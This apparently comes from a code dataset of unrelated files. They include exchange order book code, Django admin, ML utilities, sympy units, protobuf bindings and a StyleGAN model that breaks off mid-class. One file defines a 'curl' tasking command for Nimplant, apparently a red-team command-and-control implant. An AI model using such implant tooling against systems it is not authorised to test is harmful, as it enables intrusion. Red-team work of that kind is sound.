snapshot_timestamp,
metadata={"trading_pair": trading_pair}
)
active_order_tracker: CoinbaseProActiveOrderTracker = CoinbaseProActiveOrderTracker()
bids, asks = active_order_tracker.convert_snapshot_message_to_order_book_row(snapshot_msg)
order_book = self.order_book_create_function()
order_book.apply_snapshot(bids, asks, snapshot_msg.update_id)
return order_book
async def get_tracking_pairs(self) -> Dict[str, OrderBookTrackerEntry]:
"""
*required
Initializes order books and order book trackers for the list of trading pairs
returned by `self.get_trading_pairs`
:returns: A dictionary of order book trackers for each trading pair
"""
# Get the currently active markets
trading_pairs: List[str] = self._trading_pairs
retval: Dict[str, OrderBookTrackerEntry] = {}
rest_assistant = await self._get_rest_assistant()
number_of_pairs: int = len(trading_pairs)
for index, trading_pair in enumerate(trading_pairs):
try:
snapshot: Dict[str, any] = await self.get_snapshot(rest_assistant, trading_pair)
snapshot_timestamp: float = time.time()
snapshot_msg: OrderBookMessage = CoinbaseProOrderBook.snapshot_message_from_exchange(
snapshot,
snapshot_timestamp,
metadata={"trading_pair": trading_pair}
)
order_book: OrderBook = self.order_book_create_function()
active_order_tracker: CoinbaseProActiveOrderTracker = CoinbaseProActiveOrderTracker()
bids, asks = active_order_tracker.convert_snapshot_message_to_order_book_row(snapshot_msg)
order_book.apply_snapshot(bids, asks, snapshot_msg.update_id)
retval[trading_pair] = CoinbaseProOrderBookTrackerEntry(
trading_pair,
snapshot_timestamp,
order_book,
active_order_tracker
)
self.logger().info(f"Initialized order book for {trading_pair}. "
f"{index+1}/{number_of_pairs} completed.")
await self._sleep(0.6)
except IOError:
self.logger().network(
f"Error getting snapshot for {trading_pair}.",
exc_info=True,
app_warning_msg=f"Error getting snapshot for {trading_pair}. Check network connection."
)
except Exception:
self.logger().error(f"Error initializing order book for {trading_pair}. ", exc_info=True)
return retval
async def _iter_messages(self, ws: WSAssistant) -> AsyncIterable[Dict]:
"""
Generator function that returns messages from the web socket stream
:param ws: current web socket connection
:returns: message in AsyncIterable format
"""
# Terminate the recv() loop as soon as the next message timed out, so the outer loop can reconnect.
try:
async for response in ws.iter_messages():
msg = response.data
yield msg
except asyncio.TimeoutError:
self.logger().warning("WebSocket ping timed out. Going to reconnect...")
finally:
await ws.disconnect()
async def listen_for_trades(self, ev_loop: asyncio.BaseEventLoop, output: asyncio.Queue):
# Trade messages are received from the order book web socket
pass
async def listen_for_order_book_diffs(self, ev_loop: asyncio.AbstractEventLoop, output: asyncio.Queue):
"""
*required
Subscribe to diff channel via web socket, and keep the connection open for incoming messages
:param ev_loop: ev_loop to execute this function in
:param output: an async queue where the incoming messages are stored
"""
while True:
try:
trading_pairs: List[str] = self._trading_pairs
ws_assistant = await self._web_assistants_factory.get_ws_assistant()
await ws_assistant.connect(CONSTANTS.WS_URL, message_timeout=CONSTANTS.WS_MESSAGE_TIMEOUT)
subscribe_payload = {
"type": "subscribe",
"product_ids": trading_pairs,
"channels": [CONSTANTS.FULL_CHANNEL_NAME]
}
subscribe_request = WSRequest(payload=subscribe_payload)
await ws_assistant.subscribe(subscribe_request)
async for msg in self._iter_messages(ws_assistant):
msg_type: str = msg.get("type", None)
if msg_type is None:
raise ValueError(f"Coinbase Pro Websocket message does not contain a type - {msg}")
elif msg_type == "error":
raise ValueError(f"Coinbase Pro Websocket received error message - {msg['message']}")
elif msg_type in ["open", "match", "change", "done"]:
if msg_type == "done" and "price" not in msg:
# done messages with no price are completed market orders which can be ignored
continue
order_book_message: OrderBookMessage = CoinbaseProOrderBook.diff_message_from_exchange(msg)
output.put_nowait(order_book_message)
elif msg_type in ["received", "activate", "subscriptions"]:
# these messages are not needed to track the order book
continue
else:
raise ValueError(f"Unrecognized Coinbase Pro Websocket message received - {msg}")
except asyncio.CancelledError:
raise
except Exception:
self.logger().network(
"Unexpected error with WebSocket connection.",
exc_info=True,
                    app_warning_msg=f"Unexpected error with WebSocket connection."
                                    f" Retrying in {CONSTANTS.WS_RECONNECT_COOLDOWN} seconds."
f" Check network connection."
)
await self._sleep(CONSTANTS.WS_RECONNECT_COOLDOWN)
async def listen_for_order_book_snapshots(self, ev_loop: asyncio.BaseEventLoop, output: asyncio.Queue):
"""
*required
Fetches order book snapshots for each trading pair, and use them to update the local order book
:param ev_loop: ev_loop to execute this function in
:param output: an async queue where the incoming messages are stored
"""
while True:
try:
trading_pairs: List[str] = self._trading_pairs
rest_assistant = await self._get_rest_assistant()
for trading_pair in trading_pairs:
try:
snapshot: Dict[str, any] = await self.get_snapshot(rest_assistant, trading_pair)
snapshot_timestamp: float = time.time()
snapshot_msg: OrderBookMessage = CoinbaseProOrderBook.snapshot_message_from_exchange(
snapshot,
snapshot_timestamp,
metadata={"product_id": trading_pair}
)
output.put_nowait(snapshot_msg)
self.logger().debug(f"Saved order book snapshot for {trading_pair}")
# Be careful not to go above API rate limits.
await self._sleep(CONSTANTS.REST_API_LIMIT_COOLDOWN)
except asyncio.CancelledError:
raise
except Exception:
                        self.logger().network(
                            "Unexpected error fetching order book snapshot.",
                            exc_info=True,
                            app_warning_msg=f"Unexpected error fetching order book snapshot."
f" Retrying in {CONSTANTS.REST_API_LIMIT_COOLDOWN} seconds."
f" Check network connection."
)
await self._sleep(CONSTANTS.REST_API_LIMIT_COOLDOWN)
this_hour: pd.Timestamp = pd.Timestamp.utcnow().replace(minute=0, second=0, microsecond=0)
next_hour: pd.Timestamp = this_hour + pd.Timedelta(hours=1)
delta: float = next_hour.timestamp() - time.time()
await self._sleep(delta)
except asyncio.CancelledError:
raise
except Exception:
self.logger().error("Unexpected error.", exc_info=True)
await self._sleep(CONSTANTS.REST_API_LIMIT_COOLDOWN)
async def _sleep(self, delay: float):
await asyncio.sleep(delay)
async def _get_rest_assistant(self) -> RESTAssistant:
if self._rest_assistant is None:
self._rest_assistant = await self._web_assistants_factory.get_rest_assistant()
return self._rest_assistant
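
# Usage sketch (illustrative only): driving the data source directly instead
# of through Hummingbot's order book tracker. The trading pair and the
# event-loop wiring below are assumptions.
#
#   import asyncio
#   data_source = CoinbaseProAPIOrderBookDataSource(trading_pairs=["BTC-USD"])
#   order_book = asyncio.get_event_loop().run_until_complete(
#       data_source.get_new_order_book("BTC-USD"))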
|
emails/admin.py | Jordzman/explorer | 917 | 12716879 | <filename>emails/admin.py
from django.contrib import admin
from emails.models import SentEmail
class SentEmailAdmin(admin.ModelAdmin):
list_display = (
'id',
'sent_at',
'from_email',
'from_name',
'to_email',
'to_name',
'body_template',
'subject',
'auth_user',
'address_subscription',
'transaction_event',
'address_forwarding',
)
list_filter = ('body_template', )
raw_id_fields = ('auth_user', 'address_subscription', 'transaction_event', 'address_forwarding', )
class Meta:
model = SentEmail
admin.site.register(SentEmail, SentEmailAdmin)
|
Payload_Type/Nimplant/mythic/agent_functions/curl.py | cybernomad1/Nimplant | 152 | 12716880 | <gh_stars>100-1000
from CommandBase import *
import json
class CurlArguments(TaskArguments):
def __init__(self, command_line):
super().__init__(command_line)
self.args = {
"url": CommandParameter(
name="url",
type=ParameterType.String,
description="URL to request.",
default_value="https://www.google.com",
),
"method": CommandParameter(
name="method",
type=ParameterType.ChooseOne,
description="Type of request",
choices=["GET", "POST"],
),
"headers": CommandParameter(
name="headers",
type=ParameterType.String,
description="base64 encoded json with headers.",
required=False,
),
"body": CommandParameter(
name="body",
type=ParameterType.String,
description="base64 encoded body.",
required=False,
),
}
async def parse_arguments(self):
self.load_args_from_json_string(self.command_line)
class CurlCommand(CommandBase):
cmd = "curl"
needs_admin = False
help_cmd = 'curl { "url": "https://www.google.com", "method": "GET", "headers": "", "body": "" }'
description = "Execute a single web request."
version = 1
is_exit = False
is_file_browse = False
is_process_list = False
is_download_file = False
is_remove_file = False
is_upload_file = False
author = "@NotoriousRebel"
argument_class = CurlArguments
attackmapping = []
async def create_tasking(self, task: MythicTask) -> MythicTask:
return task
async def process_response(self, response: AgentResponse):
pass
|
chainerrl/misc/init_like_torch.py | ConnectionMaster/chainerrl | 923 | 12716889 | <reponame>ConnectionMaster/chainerrl
from chainer import links as L
import numpy as np
def init_like_torch(link):
# Mimic torch's default parameter initialization
# TODO(muupan): Use chainer's initializers when it is merged
for li in link.links():
if isinstance(li, L.Linear):
out_channels, in_channels = li.W.shape
stdv = 1 / np.sqrt(in_channels)
li.W.array[:] = np.random.uniform(-stdv, stdv, size=li.W.shape)
if li.b is not None:
li.b.array[:] = np.random.uniform(-stdv, stdv, size=li.b.shape)
elif isinstance(li, L.Convolution2D):
out_channels, in_channels, kh, kw = li.W.shape
stdv = 1 / np.sqrt(in_channels * kh * kw)
li.W.array[:] = np.random.uniform(-stdv, stdv, size=li.W.shape)
if li.b is not None:
li.b.array[:] = np.random.uniform(-stdv, stdv, size=li.b.shape)
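
# Usage sketch (illustrative only; layer sizes are arbitrary assumptions):
#
#   model = L.Linear(4, 3)   # or any chainer Chain built from Linear/Convolution2D links
#   init_like_torch(model)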
|
sympy/physics/units/definitions/__init__.py | giorgosgiapis/sympy | 445 | 12716890 | from .unit_definitions import (
percent, percents,
permille,
rad, radian, radians,
deg, degree, degrees,
sr, steradian, steradians,
mil, angular_mil, angular_mils,
m, meter, meters,
kg, kilogram, kilograms,
s, second, seconds,
A, ampere, amperes,
K, kelvin, kelvins,
mol, mole, moles,
cd, candela, candelas,
g, gram, grams,
mg, milligram, milligrams,
ug, microgram, micrograms,
newton, newtons, N,
joule, joules, J,
watt, watts, W,
pascal, pascals, Pa, pa,
hertz, hz, Hz,
coulomb, coulombs, C,
volt, volts, v, V,
ohm, ohms,
siemens, S, mho, mhos,
farad, farads, F,
henry, henrys, H,
tesla, teslas, T,
weber, webers, Wb, wb,
optical_power, dioptre, D,
lux, lx,
katal, kat,
gray, Gy,
becquerel, Bq,
km, kilometer, kilometers,
dm, decimeter, decimeters,
cm, centimeter, centimeters,
mm, millimeter, millimeters,
um, micrometer, micrometers, micron, microns,
nm, nanometer, nanometers,
pm, picometer, picometers,
ft, foot, feet,
inch, inches,
yd, yard, yards,
mi, mile, miles,
nmi, nautical_mile, nautical_miles,
l, liter, liters,
dl, deciliter, deciliters,
cl, centiliter, centiliters,
ml, milliliter, milliliters,
ms, millisecond, milliseconds,
us, microsecond, microseconds,
ns, nanosecond, nanoseconds,
ps, picosecond, picoseconds,
minute, minutes,
h, hour, hours,
day, days,
anomalistic_year, anomalistic_years,
sidereal_year, sidereal_years,
tropical_year, tropical_years,
common_year, common_years,
julian_year, julian_years,
draconic_year, draconic_years,
gaussian_year, gaussian_years,
full_moon_cycle, full_moon_cycles,
year, years, tropical_year,
G, gravitational_constant,
c, speed_of_light,
elementary_charge,
Z0,
hbar,
planck,
eV, electronvolt, electronvolts,
avogadro_number,
avogadro, avogadro_constant,
boltzmann, boltzmann_constant,
stefan, stefan_boltzmann_constant,
R, molar_gas_constant,
faraday_constant,
josephson_constant,
von_klitzing_constant,
amu, amus, atomic_mass_unit, atomic_mass_constant,
gee, gees, acceleration_due_to_gravity,
u0, magnetic_constant, vacuum_permeability,
e0, electric_constant, vacuum_permittivity,
Z0, vacuum_impedance,
coulomb_constant, coulombs_constant, electric_force_constant,
atmosphere, atmospheres, atm,
kPa, kilopascal,
bar, bars,
pound, pounds,
psi,
dHg0,
mmHg, torr,
mmu, mmus, milli_mass_unit,
quart, quarts,
ly, lightyear, lightyears,
au, astronomical_unit, astronomical_units,
planck_mass,
planck_time,
planck_temperature,
planck_length,
planck_charge,
planck_area,
planck_volume,
planck_momentum,
planck_energy,
planck_force,
planck_power,
planck_density,
planck_energy_density,
planck_intensity,
planck_angular_frequency,
planck_pressure,
planck_current,
planck_voltage,
planck_impedance,
planck_acceleration,
bit, bits,
byte,
kibibyte, kibibytes,
mebibyte, mebibytes,
gibibyte, gibibytes,
tebibyte, tebibytes,
pebibyte, pebibytes,
exbibyte, exbibytes,
curie, rutherford
)
|
app/src/main/python/package1/package12/python.py | Tanita2529/chaquopy | 336 | 12716896 | x = "python 12"
|
tf_coder/tf_coder_main.py | hstrohm/PyTorch-Coder-cheat | 245 | 12716902 | <reponame>hstrohm/PyTorch-Coder-cheat
# Copyright 2021 The TF-Coder Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Lint as: python3
"""A script for using TF-Coder (an alternative to using the Colab notebook).
Usage:
1. Edit `get_problem()` to specify your problem.
2. If desired, edit `get_settings()` to specify settings for TF-Coder.
3. Run this file, e.g., `python3 tf_coder_main.py`.
"""
import os
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3' # Must happen before importing tf.
os.environ['CUDA_VISIBLE_DEVICES'] = '-1' # CPU is faster than GPU.
from absl import app # pylint: disable=g-import-not-at-top
import numpy as np # pylint: disable=unused-import
import tensorflow as tf # pylint: disable=unused-import
from tf_coder.value_search import colab_interface
from tf_coder.value_search import value_search_settings as settings_module
def get_problem():
"""Specifies a problem to run TF-Coder on. Edit this function!"""
# A dict mapping input variable names to input tensors.
inputs = {
'rows': [10, 20, 30],
'cols': [1, 2, 3, 4],
}
# The single desired output tensor.
output = [[11, 12, 13, 14],
[21, 22, 23, 24],
[31, 32, 33, 34]]
# A list of relevant scalar constants (if any).
constants = []
# An English description of the tensor manipulation.
description = 'add two vectors with broadcasting to get a matrix'
return inputs, output, constants, description
def get_settings():
"""Specifies settings for TF-Coder. Edit this function!"""
# How long to search for a solution, in seconds.
time_limit = 300
# How many solutions to find before stopping. If more than 1, the entire
# search will slow down.
number_of_solutions = 1
# Whether solutions must use all inputs, at least one input, or no such
# requirement. Choose one of "all inputs", "one input", "no restriction".
solution_requirement = 'all inputs'
assert solution_requirement in ['all inputs', 'one input', 'no restriction']
return settings_module.from_dict({
'timeout': time_limit,
'only_minimal_solutions': False,
'max_solutions': number_of_solutions,
'require_all_inputs_used': solution_requirement == 'all inputs',
'require_one_input_used': solution_requirement == 'one input',
})
def run_tf_coder(inputs, output, constants, description, settings):
"""Runs TF-Coder on a problem, using the given settings."""
# Results will be printed to standard output.
colab_interface.run_value_search_from_colab(
inputs, output, constants, description, settings)
def print_supported_operations():
"""Run this function to print all supported operations."""
colab_interface.print_supported_operations()
def main(unused_argv):
# It takes several seconds to load the models.
colab_interface.warm_up()
inputs, output, constants, description = get_problem()
settings = get_settings()
run_tf_coder(inputs, output, constants, description, settings)
if __name__ == '__main__':
app.run(main)
|
caql/gaussian_noise_policy_test.py | deepneuralmachine/google-research | 23,901 | 12716932 | <reponame>deepneuralmachine/google-research<filename>caql/gaussian_noise_policy_test.py
# coding=utf-8
# Copyright 2021 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for gaussian_noise_policy."""
from unittest import mock
from absl import logging
import numpy as np
import tensorflow as tf
from tf_agents.specs import array_spec
from caql import agent_policy
from caql import gaussian_noise_policy
class GaussianNoisePolicyTest(tf.test.TestCase):
def setUp(self):
super(GaussianNoisePolicyTest, self).setUp()
seed = 199
logging.info('Setting the numpy seed to %d', seed)
np.random.seed(seed)
self._mock_policy = mock.create_autospec(
agent_policy.AgentPolicy, instance=True)
self._mock_policy.continuous_action = True
self._mock_policy.action_spec = array_spec.BoundedArraySpec(
shape=(3,), dtype=np.float, minimum=[0, 0, 0], maximum=[1, 1, 1])
def testNoneAction(self):
self._mock_policy.action.return_value = None
policy = gaussian_noise_policy.GaussianNoisePolicy(
self._mock_policy, 0.9, 0.7, 0.01)
self.assertIsNone(policy.action(np.arange(2)))
def testGaussianNoiseAction(self):
self._mock_policy.action.return_value = np.array([0.2, 0.5, 0.8])
policy = gaussian_noise_policy.GaussianNoisePolicy(
self._mock_policy, 0.9, 0.1, 0.01)
action = policy.action(np.arange(2))
policy.update_params()
self.assertAllClose([1.19726433, 0.20994996, 2.85986947], action)
action = policy.action(np.arange(2))
policy.update_params()
self.assertAllClose([0.03390958, 0.36193276, 0.89809503], action)
action = policy.action(np.arange(2))
policy.update_params()
self.assertAllClose([0.21209471, 0.49707365, 0.79036936], action)
def testSigmaDecay(self):
sigma = 0.9
decay_rate = 0.7
sigma_min = 0.01
policy = gaussian_noise_policy.GaussianNoisePolicy(
self._mock_policy, sigma, decay_rate, sigma_min)
for _ in range(20):
policy.update_params()
sigma = max(sigma * decay_rate, sigma_min)
self.assertAlmostEqual(sigma, policy.sigma)
if __name__ == '__main__':
tf.test.main()
|
silk/__init__.py | eduzen/django-silk | 2,027 | 12716959 | import django
from pkg_resources import DistributionNotFound, get_distribution
try:
__version__ = get_distribution("django-silk").version
except DistributionNotFound:
pass
if django.VERSION < (3, 2):
default_app_config = "silk.apps.SilkAppConfig"
|
onnxmltools/convert/coreml/operator_converters/neural_network/Concat.py | xhochy/onnxmltools | 623 | 12716980 | <gh_stars>100-1000
# SPDX-License-Identifier: Apache-2.0
from ....common._apply_operation import apply_concat
from ....common._registration import register_converter
def convert_concat(scope, operator, container):
if operator.raw_operator.concat.sequenceConcat:
axis = 0
else:
axis = 1
apply_concat(scope, operator.input_full_names, operator.output_full_names, container,
operator_name=operator.full_name, axis=axis)
register_converter('concat', convert_concat)
|
coloranalytics.py | lihao2333/cubr | 300 | 12717036 | # coloranalytics.py
# <NAME>
# CMU S13 15-112 Term Project
from math import e
class Profile(object):
def __init__(self, color, meanSat, meanHue, meanVal, meanSqSat, meanSqHue, meanSqVal):
self.color = color
self.meanSat = meanSat
self.meanHue = meanHue
self.meanVal = meanVal
self.meanSqSat = meanSqSat
self.meanSqHue = meanSqHue
self.meanSqVal = meanSqVal
def probability(self, h, s, v, hOff):
h -= hOff
hWeight = float(self.meanSqSat) / (max(self.meanSqHue, 1))
vWeight = float(self.meanSqVal) / (max(self.meanSqVal, 1))
sWeight = 1.
weightSum = hWeight + sWeight + vWeight
hWeight = hWeight / weightSum
sWeight = sWeight / weightSum
vWeight = vWeight / weightSum
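        # NOTE: the weights computed above are immediately overridden below,
        # so classification currently relies on hue alone (sat/val ignored).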
hWeight = 1.
sWeight = vWeight = 0.
devsH = ((h - self.meanHue) ** 2) / max(1., self.meanSqHue)
devsS = ((s - self.meanSat) ** 2) / max(1., self.meanSqSat)
devsV = ((v - self.meanVal) ** 2) / max(1., self.meanSqVal)
prob = 0
prob += hWeight * (e ** (-abs(devsH)))
prob += sWeight * (e ** (-abs(devsS)))
prob += vWeight * (e ** (-abs(devsV)))
return prob
class Profiles(object):
def __init__(self):
with open('coloranalytics.txt') as file:
data = eval(file.read())
self.colorProfiles = [ ]
self.hueOffset = 0
self.rgbOffset = (0,0,0)
for color in data:
profile = [ ]
profile.append(color)
sats = [i[0] for i in data[color]]
hues = [i[1] for i in data[color]]
vals = [i[2] for i in data[color]]
meanSat = float(sum(sats)) / len(sats)
meanHue = float(sum(hues)) / len(hues)
meanVal = float(sum(vals)) / len(vals)
sqsSat = [(sat - meanSat)**2 for sat in sats]
meanSqSat = float(sum(sqsSat)) / len(sqsSat)
sqsHue = [(hue - meanHue)**2 for hue in hues]
meanSqHue = float(sum(sqsHue)) / len(sqsHue)
sqsVal = [(val - meanVal)**2 for val in vals]
meanSqVal = float(sum(sqsVal)) / len(sqsVal)
self.colorProfiles.append(Profile(color, meanSat, meanHue, meanVal,
meanSqSat, meanSqHue, meanSqVal))
def getColor(self, h, s, v):
maxProb = -1
maxProfile = None
for profile in self.colorProfiles:
prob = profile.probability(h,s,v, self.hueOffset)
if prob > maxProb:
maxProfile = profile
maxProb = prob
return maxProfile.color
def colorByHSV(hue, sat, val):
# this is an optional feature not used in this release.
return profiles.getColor(hue, sat, val)
def colorByRGB(*args):
if len(args) == 4:
(rgb, h, s, v) = args
elif len(args) == 2:
(rgb, hsv) = args
(h, s, v) = hsv
(blue, green, red) = rgb
(blueOff, greenOff, redOff) = profiles.rgbOffset
red += redOff
green += greenOff
blue += blueOff
green = float(max(green, 1))
red = float(max(red, 1))
blue = float(max(blue, 1))
if blue / red > 2 and blue / green > 2:
return 'blue'
elif green / red > 2:
return 'green'
if h > 150 or h < 6:
return 'red'
elif h < 20 and s < 150:
return 'white'
elif h < 20:
return 'orange'
elif h < 50:
return 'yellow'
return 'white'
profiles = Profiles()
def updateWhite(rgb):
(red, green, blue) = rgb
avg = (red + green + blue) / 3
profiles.rgbOffset = (avg - red, avg - green, avg - blue) |
apis/models/base.py | IndraP24/katana | 102 | 12717058 | from pydantic import BaseModel
class TrainingStatusResponse(BaseModel):
trainingId: str = "056b5d3d-f983-4cd3-8fbd-20b8dad24e0f"
status: str = "Training queued"
|
services/internal/protocol/lobby_custom_pb2.py | yanxianhe/go-xserver | 160 | 12717060 | <gh_stars>100-1000
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: lobby_custom.proto
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
from google.protobuf import descriptor_pb2
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
DESCRIPTOR = _descriptor.FileDescriptor(
name='lobby_custom.proto',
package='protocol',
syntax='proto3',
serialized_pb=_b('\n\x12lobby_custom.proto\x12\x08protocol\"2\n\x0eROLE_BASE_INFO\x12\x0e\n\x06RoleID\x18\x01 \x01(\x04\x12\x10\n\x08RoleName\x18\x02 \x01(\t\">\n\x10ROLE_DETAIL_INFO\x12*\n\x08\x42\x61seInfo\x18\x01 \x01(\x0b\x32\x18.protocol.ROLE_BASE_INFOb\x06proto3')
)
_ROLE_BASE_INFO = _descriptor.Descriptor(
name='ROLE_BASE_INFO',
full_name='protocol.ROLE_BASE_INFO',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='RoleID', full_name='protocol.ROLE_BASE_INFO.RoleID', index=0,
number=1, type=4, cpp_type=4, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='RoleName', full_name='protocol.ROLE_BASE_INFO.RoleName', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=32,
serialized_end=82,
)
_ROLE_DETAIL_INFO = _descriptor.Descriptor(
name='ROLE_DETAIL_INFO',
full_name='protocol.ROLE_DETAIL_INFO',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='BaseInfo', full_name='protocol.ROLE_DETAIL_INFO.BaseInfo', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=84,
serialized_end=146,
)
_ROLE_DETAIL_INFO.fields_by_name['BaseInfo'].message_type = _ROLE_BASE_INFO
DESCRIPTOR.message_types_by_name['ROLE_BASE_INFO'] = _ROLE_BASE_INFO
DESCRIPTOR.message_types_by_name['ROLE_DETAIL_INFO'] = _ROLE_DETAIL_INFO
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
ROLE_BASE_INFO = _reflection.GeneratedProtocolMessageType('ROLE_BASE_INFO', (_message.Message,), dict(
DESCRIPTOR = _ROLE_BASE_INFO,
__module__ = 'lobby_custom_pb2'
# @@protoc_insertion_point(class_scope:protocol.ROLE_BASE_INFO)
))
_sym_db.RegisterMessage(ROLE_BASE_INFO)
ROLE_DETAIL_INFO = _reflection.GeneratedProtocolMessageType('ROLE_DETAIL_INFO', (_message.Message,), dict(
DESCRIPTOR = _ROLE_DETAIL_INFO,
__module__ = 'lobby_custom_pb2'
# @@protoc_insertion_point(class_scope:protocol.ROLE_DETAIL_INFO)
))
_sym_db.RegisterMessage(ROLE_DETAIL_INFO)
# @@protoc_insertion_point(module_scope)
|
src/tests/test_crashing.py | fabm3n/pretix | 1,248 | 12717069 | #
# This file is part of pretix (Community Edition).
#
# Copyright (C) 2014-2020 <NAME> and contributors
# Copyright (C) 2020-2021 rami.io GmbH and contributors
#
# This program is free software: you can redistribute it and/or modify it under the terms of the GNU Affero General
# Public License as published by the Free Software Foundation in version 3 of the License.
#
# ADDITIONAL TERMS APPLY: Pursuant to Section 7 of the GNU Affero General Public License, additional terms are
# applicable granting you additional permissions and placing additional restrictions on your usage of this software.
# Please refer to the pretix LICENSE file to obtain the full terms applicable to this work. If you did not receive
# this file, see <https://pretix.eu/about/en/license>.
#
# This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied
# warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU Affero General Public License for more
# details.
#
# You should have received a copy of the GNU Affero General Public License along with this program. If not, see
# <https://www.gnu.org/licenses/>.
#
import os
import pytest
@pytest.mark.skip
def test_crash():
"""
This is a test that crashes with SIGKILL every (n+1)-th time it runs (n = 0, 1, 2, …).
This is useful for debugging our pytest-xdist monkeypatch that we apply in conftest.py
to deal with random test crashes on Travis CI using SQLite. Usually, this test is
skipped to avoid causing additional crashes in real runs.
"""
if os.path.exists('crashed.tmp'):
assert 1
os.remove('crashed.tmp')
else:
with open('crashed.tmp', 'w') as f:
f.write('hi')
os.kill(os.getpid(), 9)
|
ML/Pytorch/GANs/StyleGAN/model.py | shimon-c/Machine-Learning-Collection | 3,094 | 12717072 | <filename>ML/Pytorch/GANs/StyleGAN/model.py
import torch
import torch.nn as nn
import torch.nn.functional as F
from math import log2
factors = [1, 1, 1, 1, 1 / 2, 1 / 4, 1 / 8, 1 / 16, 1 / 32]
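# factors[i] scales the base channel count used at resolution 4 * 2**i: early
# (low-resolution) blocks keep the full width, later blocks shrink it.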
class PixelNorm(nn.Module):
def __init__(self):
super(PixelNorm, self).__init__()
self.epsilon = 1e-8
def forward(self, x):
return x / torch.sqrt(torch.mean(x ** 2, dim=1, keepdim=True) + self.epsilon)
class MappingNetwork(nn.Module):
def __init__(self, z_dim, w_dim):
super().__init__()
self.mapping = nn.Sequential(
PixelNorm(),
WSLinear(z_dim, w_dim),
nn.ReLU(),
WSLinear(w_dim, w_dim),
nn.ReLU(),
WSLinear(w_dim, w_dim),
nn.ReLU(),
WSLinear(w_dim, w_dim),
nn.ReLU(),
WSLinear(w_dim, w_dim),
nn.ReLU(),
WSLinear(w_dim, w_dim),
nn.ReLU(),
WSLinear(w_dim, w_dim),
nn.ReLU(),
WSLinear(w_dim, w_dim),
)
def forward(self, x):
return self.mapping(x)
class InjectNoise(nn.Module):
def __init__(self, channels):
super().__init__()
self.weight = nn.Parameter(torch.zeros(1, channels, 1, 1))
def forward(self, x):
noise = torch.randn((x.shape[0], 1, x.shape[2], x.shape[3]), device=x.device)
return x + self.weight * noise
class AdaIN(nn.Module):
def __init__(self, channels, w_dim):
super().__init__()
self.instance_norm = nn.InstanceNorm2d(channels)
self.style_scale = WSLinear(w_dim, channels)
self.style_bias = WSLinear(w_dim, channels)
def forward(self, x, w):
x = self.instance_norm(x)
style_scale = self.style_scale(w).unsqueeze(2).unsqueeze(3)
style_bias = self.style_bias(w).unsqueeze(2).unsqueeze(3)
return style_scale * x + style_bias
class WSConv2d(nn.Module):
def __init__(
self, in_channels, out_channels, kernel_size=3, stride=1, padding=1, gain=2,
):
super(WSConv2d, self).__init__()
self.conv = nn.Conv2d(in_channels, out_channels, kernel_size, stride, padding)
self.scale = (gain / (in_channels * (kernel_size ** 2))) ** 0.5
self.bias = self.conv.bias
self.conv.bias = None
# initialize conv layer
nn.init.normal_(self.conv.weight)
nn.init.zeros_(self.bias)
def forward(self, x):
return self.conv(x * self.scale) + self.bias.view(1, self.bias.shape[0], 1, 1)
class WSLinear(nn.Module):
def __init__(
self, in_features, out_features, gain=2,
):
super(WSLinear, self).__init__()
self.linear = nn.Linear(in_features, out_features)
self.scale = (gain / in_features)**0.5
self.bias = self.linear.bias
self.linear.bias = None
# initialize linear layer
nn.init.normal_(self.linear.weight)
nn.init.zeros_(self.bias)
def forward(self, x):
return self.linear(x * self.scale) + self.bias
class GenBlock(nn.Module):
def __init__(self, in_channels, out_channels, w_dim):
super(GenBlock, self).__init__()
self.conv1 = WSConv2d(in_channels, out_channels)
self.conv2 = WSConv2d(out_channels, out_channels)
self.leaky = nn.LeakyReLU(0.2, inplace=True)
self.inject_noise1 = InjectNoise(out_channels)
self.inject_noise2 = InjectNoise(out_channels)
self.adain1 = AdaIN(out_channels, w_dim)
self.adain2 = AdaIN(out_channels, w_dim)
def forward(self, x, w):
x = self.adain1(self.leaky(self.inject_noise1(self.conv1(x))), w)
x = self.adain2(self.leaky(self.inject_noise2(self.conv2(x))), w)
return x
class ConvBlock(nn.Module):
def __init__(self, in_channels, out_channels):
super(ConvBlock, self).__init__()
self.conv1 = WSConv2d(in_channels, out_channels)
self.conv2 = WSConv2d(out_channels, out_channels)
self.leaky = nn.LeakyReLU(0.2)
def forward(self, x):
